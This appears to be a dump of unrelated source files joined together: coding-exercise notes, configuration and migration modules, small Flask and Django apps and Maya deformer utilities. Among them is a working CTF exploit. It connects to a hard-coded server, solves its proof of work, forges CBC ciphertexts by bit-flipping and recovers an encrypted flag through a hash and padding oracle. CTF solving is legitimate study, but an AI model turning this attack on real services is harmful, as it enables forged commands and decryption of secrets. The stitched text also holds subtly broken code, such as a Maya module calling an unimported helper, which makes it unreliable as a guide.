DCP_13(s,k)
#64
#solve time : 1h50m incl notes,comments
#the main challenges here were making the function robust to repeated elements.
#i tried to implement dynamic programming to speed up excecution time.
##beta soln's, complex and dont handle special cases (repeated digits, etc.)
#def DCP_13(s,k):
# #trivial if k=1
# if k == 1:
# print(1)
# else:
# #count rightmost digit index added to sol'n
# i=0
# #count leftmost digit index saved to sol'n
# j=0
# #starting sol'n w at the beginning of the string
# left=s[i:k+i]
# #save sol'n value
# out=str()
# #iterate over all sections of the string
# while i+k < len(s):
# i=i+1
# #store the next possible starting point w/ k-elements
# right=s[j:k+i]
# if len(set(right)) > k :
# j=j+1
# right=s[j:k+i]
# #test whether the adjacent starting points have the same elements
# if set(left).issubset( set(right) ) :#set(left) == set(right):
# left=s[j:k+i]
# out=left
# else:
# left=s[i:k+i]
# j=j+1
# print(len(out))
#finish:10:58
#
#def DCP_13(s,k):
# i=0
# j=0
# left=str()
# out=str()
# while j+1 != i :
# while len(set(left)) <= k:
# left=s[j:i+1]
# i=i+1
# out = left[:-1]
# j=j+len(out)
# left=str()
# return print(len(out))
| 3,673 | 1,293 |
import base64
import hashlib
import re
import string
import itertools
from crypto_commons.netcat.netcat_commons import receive_until_match, nc, send, receive_until
from crypto_commons.symmetrical.symmetrical import set_byte_cbc, set_cbc_payload_for_block
def PoW(suffix, digest):
for prefix in itertools.product(string.ascii_letters + string.digits, repeat=4):
p = "".join(prefix)
if hashlib.sha256(p + suffix).hexdigest() == digest:
return p
def pad(msg):
pad_length = 16 - len(msg) % 16
return msg + chr(pad_length) * pad_length
def generate_payload_from_message(encrypted, plaintext, new_payload):
raw = encrypted.decode("base64")
new_payload = pad(new_payload)[:16]
plaintext = ("\0" * 16) + (pad(plaintext)[:16])
payload = set_cbc_payload_for_block(raw, plaintext, new_payload, 1)
return base64.b64encode(payload)
def main():
s = nc("52.193.157.19", 9999)
data = receive_until_match(s, "Give me XXXX:")
inputs = re.findall("SHA256\(XXXX\+(.*)\) == (.*)", data)[0]
suffix = inputs[0]
digest = inputs[1]
result = PoW(suffix, digest)
print("PoW done")
send(s, result)
receive_until_match(s, "Done!\n")
welcome = receive_until(s, "\n")[:-1]
get_flag_payload = generate_payload_from_message(welcome, "Welcome!", "get-flag")
send(s, get_flag_payload)
encrypted_flag = receive_until(s, "\n")[:-1]
raw_enc_flag = encrypted_flag.decode("base64")
current = "hitcon{"
print('encrypted flag', encrypted_flag, encrypted_flag.decode("base64"), len(encrypted_flag.decode("base64")))
for block_to_recover in range(3):
malleable_block = base64.b64encode(raw_enc_flag[block_to_recover * 16:])
missing = 16 - len(current)
for spaces in range(missing):
for c in string.printable:
test_flag_block_prefix = current + c + ("\0" * (missing - spaces))
expected_command = (" " * spaces) + "get-flag"
payload = generate_payload_from_message(malleable_block, test_flag_block_prefix, expected_command)
send(s, payload)
result = receive_until(s, "\n")[:-1]
if result == encrypted_flag:
current += c
print('found matching flag char:', current)
break
print(current)
known_blocks = raw_enc_flag[16 * block_to_recover:16 * block_to_recover + 32]
expanded_flag = raw_enc_flag[16 * block_to_recover:] + known_blocks # appending IV and "Welcome!!" at the end
next_block_known = ""
for i in range(8):
get_md5 = set_cbc_payload_for_block(expanded_flag, "\0" * 16 + current, (" " * 9) + "get-md5", 1) # first block is get-md5
get_md5 = set_byte_cbc(get_md5, ("\0" * (5 - block_to_recover) * 16) + current,
(6 - block_to_recover) * 16 - 1, chr((4 - block_to_recover) * 16 - i - 1)) # last character to cut padding
send(s, base64.b64encode(get_md5))
real_md5_result = receive_until(s, "\n")[:-1]
for c in string.printable:
test_md5_payload = set_cbc_payload_for_block(expanded_flag, "\0" * 16 + current,
(" " * (8 - i - 1)) + "get-md5" + next_block_known + c, 1)
test_md5_payload = set_byte_cbc(test_md5_payload, ("\0" * (5 - block_to_recover) * 16) + current,
(6 - block_to_recover) * 16 - 1,
chr((4 - block_to_recover) * 16 + 1))
send(s, base64.b64encode(test_md5_payload))
test_md5_result = receive_until(s, "\n")[:-1]
if real_md5_result == test_md5_result:
next_block_known += c
print('found matching flag char:', next_block_known)
break
print(next_block_known)
current = next_block_known[:-1]
main()
| 4,049 | 1,391 |
import configparser
import re
import sys
import os
from typing import Optional, Mapping, Iterator, Any, List, Dict
_default_settings = {
"node": {
"id.message": "Terrestrial Amateur Radio Packet Network node ${node.alias} op is ${node.call}",
"id.interval": 600,
"admin.enabled": False,
"admin.listen": "0.0.0.0",
"admin.port": 8888
},
"network": {
"netrom.ttl": 7,
"netrom.obs.min": 4,
"netrom.obs.init": 6,
"netrom.nodes.quality.min": 73,
"netrom.nodes.interval": 300
}
}
_default_port_settings = {
"port.enabled": True,
"serial.timeout": 0.100
}
def _default_basedir(app_name):
# taken from http://stackoverflow.com/questions/1084697/
if sys.platform == "darwin":
import appdirs
return appdirs.user_data_dir(app_name, "")
elif sys.platform == "win32":
return os.path.join(os.environ["APPDATA"], app_name)
else:
return os.path.expanduser(os.path.join("~", "." + app_name.lower()))
class Settings:
def __init__(self, basedir: str = None, paths: List[str] = None, defaults: Dict = None):
self._init_basedir(basedir)
self._configfiles = [os.path.join(self._basedir, path) for path in paths]
self._config: Optional[configparser.ConfigParser] = None
if defaults is None:
self._defaults = dict()
else:
self._defaults = defaults
self.load()
def _init_basedir(self, basedir):
if basedir is not None:
self._basedir = basedir
else:
self._basedir = _default_basedir("TARPN")
if not os.path.isdir(self._basedir):
try:
os.makedirs(self._basedir)
except Exception:
print(f"Could not create base folder at {self._basedir}. This is a fatal error, TARPN "
"cannot run without a writable base folder.")
raise
def load(self):
self._config = configparser.ConfigParser(defaults=self._defaults,
interpolation=configparser.ExtendedInterpolation(),
inline_comment_prefixes=";",
default_section="default")
self._config.read_dict(_default_settings)
for path in self._configfiles:
if os.path.exists(path):
self._config.read(path)
else:
raise RuntimeError(f"No such config file {path}")
def save(self):
# self._config.write()
return
def node_config(self):
return NodeConfig(self._config["node"])
def port_configs(self):
ports = []
for section in self._config.sections():
m = re.match(r"port:(\d+)", section)
if m:
ports.append(int(m.group(1)))
port_configs = []
for port in ports:
port_sect = self._config[f"port:{port}"]
port_configs.append(PortConfig.from_dict(port, port_sect))
return port_configs
def network_configs(self):
return NetworkConfig(self._config["network"])
def app_configs(self):
apps = []
for section in self._config.sections():
m = re.match(r"app:(\w[\w\d]*)", section)
if m:
apps.append(m.group(1))
app_configs = []
for app in apps:
app_sect = self._config[f"app:{app}"]
app_configs.append(AppConfig.from_dict(app, app_sect))
return app_configs
def config_section(self, name):
return Config(name, self._config[name])
class Config(Mapping):
def __init__(self, section_name, config_section):
self._section = section_name
self._config_section = config_section
def __getitem__(self, k) -> Any:
return self._config_section[k]
def __len__(self) -> int:
return len(self._config_section)
def __iter__(self) -> Iterator:
return iter(self._config_section)
def __repr__(self) -> str:
return f"{self._section}: {dict(self._config_section)}"
def as_dict(self) -> dict:
return dict(self._config_section)
def get(self, key, default: str = None) -> str:
value = self._config_section.get(key)
if value is None:
value = default
if value is None:
raise KeyError(f"Unknown key {key} in section {self._section}")
return value
def get_int(self, key, default: int = None) -> int:
value = self._config_section.getint(key)
if value is None:
value = default
if value is None:
raise KeyError(f"Unknown key {key} in section {self._section}")
return value
def get_float(self, key, default: float = None) -> float:
value = self._config_section.getfloat(key)
if value is None:
value = default
if value is None:
raise KeyError(f"Unknown key {key} in section {self._section}")
return value
def get_boolean(self, key, default: bool = None) -> bool:
value = self._config_section.getboolean(key)
if value is None:
value = default
if value is None:
raise KeyError(f"Unknown key {key} in section {self._section}")
return value
class NodeConfig(Config):
def __init__(self, config_section):
super().__init__("node", config_section)
def node_call(self) -> str:
return super().get("node.call")
def node_alias(self) -> str:
return super().get("node.alias")
def admin_enabled(self) -> bool:
return super().get_boolean("admin.enabled")
def admin_port(self) -> int:
return super().get_int("admin.port")
def admin_listen(self) -> str:
return super().get("admin.listen")
class PortConfig(Config):
def __init__(self, port_id, port_config):
super().__init__(f"port:{port_id}", port_config)
self._port_id = port_id
def port_id(self):
return self._port_id
def port_type(self):
return super().get("port.type")
@classmethod
def from_dict(cls, port_id: int, configs: dict):
parser = configparser.ConfigParser(defaults=_default_port_settings)
parser.read_dict({f"port:{port_id}": configs})
config = parser[f"port:{port_id}"]
return cls(port_id, config)
class NetworkConfig(Config):
def __init__(self, config_section):
super().__init__("network", config_section)
def ttl(self) -> int:
return super().get_int("netrom.ttl")
def min_obs(self) -> int:
return super().get_int("netrom.obs.min")
def init_obs(self) -> int:
return super().get_int("netrom.obs.init")
def min_qual(self) -> int:
return super().get_int("netrom.nodes.quality.min")
def nodes_interval(self) -> int:
return super().get_int("netrom.nodes.interval")
def node_call(self) -> str:
return super().get("netrom.node.call")
def node_alias(self) -> str:
return super().get("netrom.node.alias")
@classmethod
def from_dict(cls, configs: dict):
parser = configparser.ConfigParser(defaults=_default_settings["network"])
parser.read_dict({f"network": configs})
config = parser[f"network"]
return cls(config)
class AppConfig(Config):
def __init__(self, app_name, app_config):
super().__init__(f"app:{app_name}", app_config)
self._app_name = app_name
def app_name(self):
return self._app_name
def app_call(self):
return super().get("app.call")
def app_alias(self):
return super().get("app.alias")
def app_socket(self):
return super().get("app.sock")
def app_module(self):
return super().get("app.module")
@classmethod
def from_dict(cls, app_name: str, configs: dict):
parser = configparser.ConfigParser()
parser.read_dict({f"app:{app_name}": configs})
config = parser[f"app:{app_name}"]
return cls(app_name, config)
| 8,170 | 2,491 |
# Copyright (c) 2017, Frappe and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils.nestedset import rebuild_tree
def execute():
frappe.reload_doc('assets', 'doctype', 'asset_finance_book')
frappe.reload_doc('assets', 'doctype', 'depreciation_schedule')
frappe.reload_doc('assets', 'doctype', 'asset_category')
frappe.reload_doc('assets', 'doctype', 'asset')
frappe.reload_doc('assets', 'doctype', 'asset_movement')
frappe.reload_doc('assets', 'doctype', 'asset_category_account')
if frappe.db.has_column("Asset", "warehouse"):
frappe.db.sql(""" update `tabAsset` ast, `tabWarehouse` wh
set ast.location = wh.warehouse_name where ast.warehouse = wh.name""")
for d in frappe.get_all('Asset'):
doc = frappe.get_doc('Asset', d.name)
if doc.calculate_depreciation:
fb = doc.append('finance_books', {
'depreciation_method': doc.depreciation_method,
'total_number_of_depreciations': doc.total_number_of_depreciations,
'frequency_of_depreciation': doc.frequency_of_depreciation,
'depreciation_start_date': doc.next_depreciation_date,
'expected_value_after_useful_life': doc.expected_value_after_useful_life,
'value_after_depreciation': doc.value_after_depreciation
})
fb.db_update()
frappe.db.sql(""" update `tabDepreciation Schedule` ds, `tabAsset` ast
set ds.depreciation_method = ast.depreciation_method, ds.finance_book_id = 1 where ds.parent = ast.name """)
for category in frappe.get_all('Asset Category'):
asset_category_doc = frappe.get_doc("Asset Category", category)
row = asset_category_doc.append('finance_books', {
'depreciation_method': asset_category_doc.depreciation_method,
'total_number_of_depreciations': asset_category_doc.total_number_of_depreciations,
'frequency_of_depreciation': asset_category_doc.frequency_of_depreciation
})
row.db_update() | 1,952 | 764 |
"""
Web GUI
Author: Irfan Chahyadi
Source: github.com/irfanchahyadi/Scraping-Manga
"""
# IMPORT REQUIRED PACKAGE
from flask import Flask, render_template, request, redirect, url_for, Response
import os, webbrowser, time
from gui import web_api
import main
app = Flask(__name__)
@app.route('/tes')
def tes():
return render_template('index2.html')
@app.route('/')
def home():
manga = web_api.get_manga()
lang = web_api.get_lang()
return render_template('index.html', data={'manga': manga, 'lang': lang})
@app.route('/crawl/<path:id_lang>')
def crawl(id_lang):
id, lang_id = id_lang.split('_')
web_api.get(id, lang_id)
return redirect(url_for('home'))
@app.route('/stop_crawl')
def stop_crawl():
web_api.stop()
return ('', 204)
@app.route('/shutdown')
def shutdown():
shutdown_server()
return "Bye, see other project on <a href='https://github.com/irfanchahyadi'>github.com/irfanchahyadi</a>"
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('Not running with the Werkzeug Server')
func()
@app.route('/progress')
def progress():
def generate():
x = 0
while x <= 200:
yield 'data: {"now":' + str(main.crawl_now) + ', "end":' + str(main.crawl_end) + ', "manga":"' + main.crawl_manga + '"}\n\n'
x = x + 1
time.sleep(0.5)
return Response(generate(), mimetype='text/event-stream')
@app.route('/new_manga', methods=['POST'])
def new_manga():
form = request.form.to_dict()
imageFile = request.files['imageFile']
web_api.add_manga(form, imageFile)
return redirect(url_for('home'))
webbrowser.open_new_tab('http://localhost:5000/')
app.run(host='0.0.0.0')
| 1,709 | 663 |
#!/usr/bin/env python3
# Author: Joel Gruselius, Dec 2018
# Script for checking index clashes
# Input one or several nucleotide sequences and print any matches found in
# the index reference file. This version is only good for checking for
# full matches.
# It is pretty useful though to list overlapping indexes in the reference file.
# Usage:
# index_finder --ref <reference_list> <index_seq>...
# TODO: Show sequences matching the first six bases not just complete matches
# TODO: Specify cache dir
import sys
import argparse
import re
import hashlib
import json
import os
import errno
COMPL_MAP = {"A": "T", "T": "A", "C": "G", "G": "C"}
def file_hash(path):
BUF_SIZE = 65536
md5_hash = hashlib.md5()
with open(path, "rb") as f:
data = f.read(BUF_SIZE)
while data:
md5_hash.update(data)
data = f.read(BUF_SIZE)
return md5_hash.hexdigest()
def rev(seq):
return seq[::-1]
def compl(seq):
c = [COMPL_MAP[nt] for nt in seq]
return "".join(c)
def rev_compl(seq):
rc = [COMPL_MAP[nt] for nt in seq[::-1]]
return "".join(rc)
# Build a dict of know index sequences from a text file:
def build_index_dict(path, length):
ref_dict = {}
if length is None:
seq_pattern = re.compile(r"(?<![ATCG])[ATCGN]{4,}")
else:
seq_pattern = re.compile(r"(?<![ATCG])[ATCGN]{{{}}}".format(length))
with open(path, "r") as ref:
for line in ref:
match = set(seq_pattern.findall(line))
if match:
for m in match:
ref_dict.setdefault(m, []).append(line.strip())
return ref_dict
def load_index_dict(path):
with open(path, "r") as f:
d = json.load(f)
return d
def save_index_dict(obj, path):
with open(path, "w") as f:
json.dump(obj, f)
def print_index_dict(ref_dict):
for seq, matches in ref_dict.items():
if len(matches) > 1:
print(seq)
for match in matches:
print("\t{}".format(match))
def main(args):
if not os.path.isfile(args.ref):
# File not found
raise OSError(errno.ENOENT, os.strerror(errno.ENOENT), args.ref)
md5 = file_hash(args.ref)
cache = "{}{}.json".format(md5, args.length or "")
if not args.rebuild and os.path.isfile(cache):
print("Loading cached index dict ({})".format(cache), file=sys.stderr)
ref_dict = load_index_dict(cache)
else:
ref_dict = build_index_dict(args.ref, args.length)
print("Caching index dict ({})".format(cache), file=sys.stderr)
save_index_dict(ref_dict, cache)
if args.list:
print_index_dict(ref_dict)
n = 0
for x in ref_dict.values():
n += len(x)
print("\nTotal barcodes parsed in reference dict: {}".format(n))
print("Unique barcodes in reference dict: {}".format(len(ref_dict)))
else:
for arg in args.seqs:
if args.length:
seq = arg[:args.length]
else:
seq = arg
if seq in ref_dict:
matches = ref_dict[seq]
print("{} found in:".format(seq))
for m in matches:
print("\t{}".format(m))
else:
print("{}: No matches found".format(seq))
if __name__ == "__main__":
p = argparse.ArgumentParser(description="Find index clashes")
g = p.add_mutually_exclusive_group(required=True)
g.add_argument("--seqs", nargs="+", help="All sequences to search for")
g.add_argument("--list", action="store_true", default=False,
help="Print non-unique indexes in the reference list")
p.add_argument("--ref", required=True, help="Reference text file containing"
" known index sequences")
p.add_argument("--rebuild", action="store_true", help="Don't use any cached"
" reference object")
p.add_argument("--length", type=int, choices=range(4,8), help="Set the "
"number of letters to consider, both in the query strings and "
"when building the reference")
main(p.parse_args())
| 4,144 | 1,334 |
# Generated by Django 3.2.5 on 2021-07-20 19:37
import cloudinary.models
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('AwardsApp', '0006_userprofile_bio'),
]
operations = [
migrations.AlterField(
model_name='project',
name='project_image',
field=cloudinary.models.CloudinaryField(max_length=255, verbose_name='images'),
),
migrations.AlterField(
model_name='userprofile',
name='profile_photo',
field=cloudinary.models.CloudinaryField(max_length=255, verbose_name='profile'),
),
]
| 658 | 206 |
"""input manatees: a list of "manatees", where one manatee is represented by a dictionary
a single manatee has properties like "name", "age", et cetera
n = the number of elements in "manatees"
m = the number of properties per "manatee" (i.e. the number of keys in a manatee dictionary)"""
# Efficiency: O(n)
def example1(manatees):
for manatee in manatees:
print manatee['name']
# Efficiency: O(1)
def example2(manatees):
print manatees[0]['name']
print manatees[0]['age']
# Efficiency: O(n*m)
def example3(manatees):
for manatee in manatees:
for manatee_property in manatee:
print manatee_property, ": ", manatee[manatee_property]
# Efficiency: O(n^2)
def example4(manatees):
oldest_manatee = "No manatees here!"
for manatee1 in manatees:
for manatee2 in manatees:
if manatee1['age'] < manatee2['age']:
oldest_manatee = manatee2['name']
else:
oldest_manatee = manatee1['name']
print oldest_manatee | 1,022 | 358 |
from django.urls import reverse
from address.models import Address
from core.tests import BaseTestSimpleApiMixin
from thairod.utils.test_util import APITestCase
from warehouse.models import Warehouse
class WarehouseAPITestCase(BaseTestSimpleApiMixin, APITestCase):
def setUp(self):
self.model = Warehouse
self.obj = Warehouse.objects.first()
self.address = Address.objects.first()
self.list_url = reverse('warehouse-list')
self.detail_url = reverse('warehouse-detail', kwargs={'pk': self.obj.pk})
self.valid_field = {
"name": "warehouse name",
"address": self.address.pk,
"tel": "0987654321",
}
| 695 | 217 |
import datetime
import logging
import logging.handlers
import os
import atexit
from flask import Flask, request, g
from flask_login import current_user
from flask_cors import CORS
from importlib import reload
from urllib.parse import urlsplit
import meltano
from meltano.core.project import Project
from meltano.core.tracking import GoogleAnalyticsTracker
from meltano.core.plugin.error import PluginMissingError
from meltano.core.plugin.settings_service import (
PluginSettingsService,
PluginSettingMissingError,
)
from meltano.core.config_service import ConfigService
from meltano.core.compiler.project_compiler import ProjectCompiler
from meltano.core.tracking import GoogleAnalyticsTracker
from meltano.core.db import project_engine
logger = logging.getLogger(__name__)
def create_app(config={}):
project = Project.find()
app = Flask(
__name__, instance_path=str(project.root), instance_relative_config=True
)
app.config.from_object("meltano.api.config")
app.config.from_pyfile("ui.cfg", silent=True)
app.config.update(**config)
# register
project_engine(
project, engine_uri=app.config["SQLALCHEMY_DATABASE_URI"], default=True
)
# Initial compilation
compiler = ProjectCompiler(project)
try:
compiler.compile()
except Exception as e:
pass
# Logging
file_handler = logging.handlers.RotatingFileHandler(
str(project.run_dir("meltano-ui.log")), backupCount=3
)
stdout_handler = logging.StreamHandler()
logger.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logger.addHandler(stdout_handler)
# 1) Extensions
security_options = {}
from .models import db
from .mail import mail
from .executor import setup_executor
from .security import security, users, setup_security
from .security.oauth import setup_oauth
from .json import setup_json
db.init_app(app)
mail.init_app(app)
setup_executor(app, project)
setup_security(app, project)
setup_oauth(app)
setup_json(app)
CORS(app, origins="*")
# 2) Register the URL Converters
from .url_converters import PluginRefConverter
app.url_map.converters["plugin_ref"] = PluginRefConverter
# 3) Register the controllers
from .controllers.root import root
from .controllers.dashboards import dashboardsBP
from .controllers.reports import reportsBP
from .controllers.repos import reposBP
from .controllers.settings import settingsBP
from .controllers.sql import sqlBP
from .controllers.orchestrations import orchestrationsBP
from .controllers.plugins import pluginsBP
app.register_blueprint(root)
app.register_blueprint(dashboardsBP)
app.register_blueprint(reportsBP)
app.register_blueprint(reposBP)
app.register_blueprint(settingsBP)
app.register_blueprint(sqlBP)
app.register_blueprint(orchestrationsBP)
app.register_blueprint(pluginsBP)
if app.config["PROFILE"]:
from .profiler import init
init(app)
# Google Analytics setup
tracker = GoogleAnalyticsTracker(project)
@app.before_request
def setup_js_context():
# setup the appUrl
appUrl = urlsplit(request.host_url)
g.jsContext = {"appUrl": appUrl.geturl()[:-1]}
if tracker.send_anonymous_usage_stats:
g.jsContext["isSendAnonymousUsageStats"] = True
g.jsContext["projectId"] = tracker.project_id
g.jsContext["version"] = meltano.__version__
# setup the airflowUrl
try:
airflow = ConfigService(project).find_plugin("airflow")
settings = PluginSettingsService(project)
airflow_port, _ = settings.get_value(
db.session, airflow, "webserver.web_server_port"
)
g.jsContext["airflowUrl"] = appUrl._replace(
netloc=f"{appUrl.hostname}:{airflow_port}"
).geturl()[:-1]
except (PluginMissingError, PluginSettingMissingError):
pass
# setup the dbtDocsUrl
g.jsContext["dbtDocsUrl"] = appUrl._replace(path="/-/dbt/").geturl()[:-1]
@app.after_request
def after_request(res):
request_message = f"[{request.url}]"
if request.method != "OPTIONS":
request_message += f" as {current_user}"
logger.info(request_message)
res.headers["X-Meltano-Version"] = meltano.__version__
return res
return app
| 4,490 | 1,366 |
import maya.cmds as cmds
import re
import rsTools.utils.openMaya.dataUtils as dUtils
import maya.OpenMayaAnim as OpenMayaAnimOld
import maya.OpenMaya as OpenMayaOld
import maya.api.OpenMaya as om
import maya.api.OpenMayaAnim as oma
def isDeformer(deformer):
if not cmds.objExists(deformer):
return False
nodeType = cmds.nodeType(deformer, i=1)
if not nodeType.count('geometryFilter'):
return False
return True
'''
isDeformer("rig_normalPushq")
getDeformerList("pSphere1",nodeType='geometryFilter')
getDeformerFn("rig_normalPushq")
getDeformerSet("rig_normalPushq")
getDeformerSetFn("rig_normalPushq")
q = getDeformerSetMembers("rig_normalPushq")
p = getDeformerSetMemberStrList("rig_normalPushq")
s = getAffectedGeometry("rig_normalPushq")
weights = getWeights("rig_normalPushq")
'''
def getAttributes(deformer):
attrs = cmds.listAttr(deformer, k=True)
if "weightList.weights" in attrs:
attrs.remove("weightList.weights")
output = []
for a in attrs:
attr = str(deformer+"."+a)
val = cmds.getAttr(attr)
output.append([attr, val])
return output
def getAttributesAndConnections(deformer):
attrs = cmds.listAttr(deformer, k=True)
if "weightList.weights" in attrs:
attrs.remove("weightList.weights")
output = []
for a in attrs:
attr = str(deformer+"."+a)
val = cmds.getAttr(attr)
connections = cmds.listConnections(attr, s=True, d=False, p=True)
if connections:
output.append([attr, val, connections[0]])
else:
output.append([attr, val, None])
return output
def getDeformerList(affectedGeometry=[], nodeType='geometryFilter', regexFilter=''):
# Get Deformer List
deformerNodes = cmds.ls(type=nodeType)
if affectedGeometry:
if type(affectedGeometry) == str:
affectedGeometry = [affectedGeometry]
historyNodes = cmds.listHistory(
affectedGeometry, groupLevels=True, pruneDagObjects=True)
deformerNodes = cmds.ls(historyNodes, type=nodeType)
# Remove Duplicates
deformerNodes = aUtils.removeDuplicates(deformerNodes)
# Remove Tweak Nodes
tweakNodes = cmds.ls(deformerNodes, type='tweak')
if tweakNodes:
deformerNodes = [x for x in deformerNodes if not x in tweakNodes]
# Remove TransferAttributes Nodes
transferAttrNodes = cmds.ls(deformerNodes, type='transferAttributes')
if transferAttrNodes:
deformerNodes = [
x for x in deformerNodes if not x in transferAttrNodes]
if regexFilter:
reFilter = re.compile(regexFilter)
deformerNodes = filter(reFilter.search, deformerNodes)
return deformerNodes
def listMeshDeformers(mesh):
historyNodes = cmds.listHistory(
mesh, groupLevels=True, pruneDagObjects=True)
deformerNodes = cmds.ls(historyNodes, type="geometryFilter")
# remove tweak
deformerNodes = aUtils.removeDuplicates(deformerNodes)
tweakNodes = cmds.ls(deformerNodes, type='tweak')
if tweakNodes:
deformerNodes = [x for x in deformerNodes if not x in tweakNodes]
# remove transfer nodes
transferAttrNodes = cmds.ls(deformerNodes, type='transferAttributes')
if transferAttrNodes:
deformerNodes = [
x for x in deformerNodes if not x in transferAttrNodes]
return deformerNodes
def getDeformerFn(deformer):
# Checks
if not cmds.objExists(deformer):
raise Exception('Deformer '+deformer+' does not exist!')
# Get MFnWeightGeometryFilter
deformerObj = dUtils.getMObject(deformer)
try:
deformerFn = oma.MFnGeometryFilter(deformerObj)
except:
raise Exception(
'Could not get a geometry filter for deformer "'+deformer+'"!')
return deformerFn
def getDeformerSet(deformer):
# Checks
if not cmds.objExists(deformer):
raise Exception('Deformer '+deformer+' does not exist!')
if not isDeformer(deformer):
raise Exception('Object '+deformer+' is not a valid deformer!')
# Get Deformer Set
deformerObj = dUtils.getMObject(deformer)
deformerFn = oma.MFnGeometryFilter(deformerObj)
deformerSetObj = deformerFn.deformerSet
if deformerSetObj.isNull():
raise Exception('Unable to determine deformer set for "'+deformer+'"!')
# Return Result
return om.MFnDependencyNode(deformerSetObj).name()
def getDeformerSetFn(deformer):
# Checks
if not cmds.objExists(deformer):
raise Exception('Deformer '+deformer+' does not exist!')
# Get deformer set
deformerSet = getDeformerSet(deformer)
# Get MFnWeightGeometryFilter
deformerSetObj = dUtils.getMObject(deformerSet)
deformerSetFn = om.MFnSet(deformerSetObj)
# Return result
return deformerSetFn
def getDeformerSetMembers(deformer, geometry=''):
'''
Return the deformer set members of the specified deformer.
You can specify a shape name to query deformer membership for.
Otherwise, membership for the first affected geometry will be returned.
Results are returned as a list containing an MDagPath to the affected shape and an MObject for the affected components.
@param deformer: Deformer to query set membership for
@type deformer: str
@param geometry: Geometry to query deformer set membership for. Optional.
@type geometry: str
'''
# Get deformer function sets
deformerSetFn = getDeformerSetFn(deformer)
# Get deformer set members
deformerSetSel = deformerSetFn.getMembers(True)
# Get geometry index
if geometry:
geomIndex = getGeomIndex(geometry, deformer)
else:
geomIndex = 0
# Get number of selection components
deformerSetLen = deformerSetSel.length()
if geomIndex >= deformerSetLen:
raise Exception('Geometry index out of range! (Deformer: "'+deformer+'", Geometry: "' +
geometry+'", GeoIndex: '+str(geomIndex)+', MaxIndex: '+str(deformerSetLen)+')')
# Get deformer set members
data = deformerSetSel.getDagPath(geomIndex)
# Return result
return data
def getDeformerSetMemberStrList(deformer, geometry=''):
'''
Return the deformer set members of the specified deformer as a list of strings.
You can specify a shape name to query deformer membership for.
Otherwise, membership for the first affected geometry will be returned.
@param deformer: Deformer to query set membership for
@type deformer: str
@param geometry: Geometry to query deformer set membership for. Optional.
@type geometry: str
'''
# Get deformer function sets
deformerSetFn = getDeformerSetFn(deformer)
# Get deformer set members
deformerSetSel = om.MSelectionList()
deformerSetFn.getMembers(deformerSetSel, True)
# Convert to list of strings
setMemberStr = []
deformerSetSel.getSelectionStrings(setMemberStr)
setMemberStr = cmds.ls(setMemberStr, fl=True)
# Return Result
return setMemberStr
def getDeformerSetMemberIndices(deformer, geometry=''):
# Check geometry
geo = geometry
if cmds.objectType(geometry) == 'transform':
try:
geometry = cmds.listRelatives(
geometry, s=True, ni=True, pa=True)[0]
except:
raise Exception('Object "'+geo+'" is not a valid geometry!')
# Get geometry type
geometryType = cmds.objectType(geometry)
# Get deformer set members
deformerSetMem = getDeformerSetMembers(deformer, geometry)
# ==========================
# - Get Set Member Indices -
# ==========================
memberIdList = []
# Single Index
if geometryType == 'mesh' or geometryType == 'nurbsCurve' or geometryType == 'particle':
memberIndices = om.MIntArray()
singleIndexCompFn = om.MFnSingleIndexedComponent(deformerSetMem[1])
singleIndexCompFn.getElements(memberIndices)
memberIdList = list(memberIndices)
# Double Index
if geometryType == 'nurbsSurface':
memberIndicesU = om.MIntArray()
memberIndicesV = om.MIntArray()
doubleIndexCompFn = om.MFnDoubleIndexedComponent(deformerSetMem[1])
doubleIndexCompFn.getElements(memberIndicesU, memberIndicesV)
for i in range(memberIndicesU.length()):
memberIdList.append([memberIndicesU[i], memberIndicesV[i]])
# Triple Index
if geometryType == 'lattice':
memberIndicesS = om.MIntArray()
memberIndicesT = om.MIntArray()
memberIndicesU = om.MIntArray()
tripleIndexCompFn = om.MFnTripleIndexedComponent(deformerSetMem[1])
tripleIndexCompFn.getElements(
memberIndicesS, memberIndicesT, memberIndicesU)
for i in range(memberIndicesS.length()):
memberIdList.append(
[memberIndicesS[i], memberIndicesT[i], memberIndicesU[i]])
# Return result
return memberIdList
def getAffectedGeometry(deformer, returnShapes=False, fullPathNames=False):
# Verify Input
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Initialize Return Array (dict)
affectedObjects = {}
# Get MFnGeometryFilter
deformerObj = dUtils.getMObject(deformer)
geoFilterFn = oma.MFnGeometryFilter(deformerObj)
# Get Output Geometry
outputObjectArray = geoFilterFn.getOutputGeometry()
dir(outputObjectArray)
# Iterate Over Affected Geometry
for i in range(len(outputObjectArray)):
# Get Output Connection at Index
outputIndex = geoFilterFn.indexForOutputShape(outputObjectArray[i])
outputNode = om.MFnDagNode(om.MObject(outputObjectArray[i]))
# Check Return Shapes
if not returnShapes:
outputNode = om.MFnDagNode(outputNode.parent(0))
# Check Full Path
if fullPathNames:
affectedObjects[outputNode.fullPathName()] = int(outputIndex)
else:
affectedObjects[outputNode.partialPathName()] = int(outputIndex)
# Return Result
return affectedObjects
def getGeomIndex(geometry, deformer):
'''
Returns the geometry index of a shape to a specified deformer.
@param geometry: Name of shape or parent transform to query
@type geometry: str
@param deformer: Name of deformer to query
@type deformer: str
'''
# Verify input
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check geometry
geo = geometry
if cmds.objectType(geometry) == 'transform':
try:
geometry = cmds.listRelatives(
geometry, s=True, ni=True, pa=True)[0]
except:
raise Exception('Object "'+geo+'" is not a valid geometry!')
geomObj = dUtils.getMObject(geometry)
# Get geometry index
deformerObj = dUtils.getMObject(deformer)
deformerFn = oma.MFnGeometryFilter(deformerObj)
try:
geomIndex = deformerFn.indexForOutputShape(geomObj)
except:
raise Exception('Object "'+geometry +
'" is not affected by deformer "'+deformer+'"!')
# Retrun result
return geomIndex
def findInputShape(shape):
'''
Return the input shape ('...ShapeOrig') for the specified shape node.
This function assumes that the specified shape is affected by at least one valid deformer.
@param shape: The shape node to find the corresponding input shape for.
@type shape: str
'''
# Checks
if not cmds.objExists(shape):
raise Exception('Shape node "'+shape+'" does not exist!')
# Get inMesh connection
inMeshConn = cmds.listConnections(
shape+'.inMesh', source=True, destination=False, shapes=True)
if not inMeshConn:
return shape
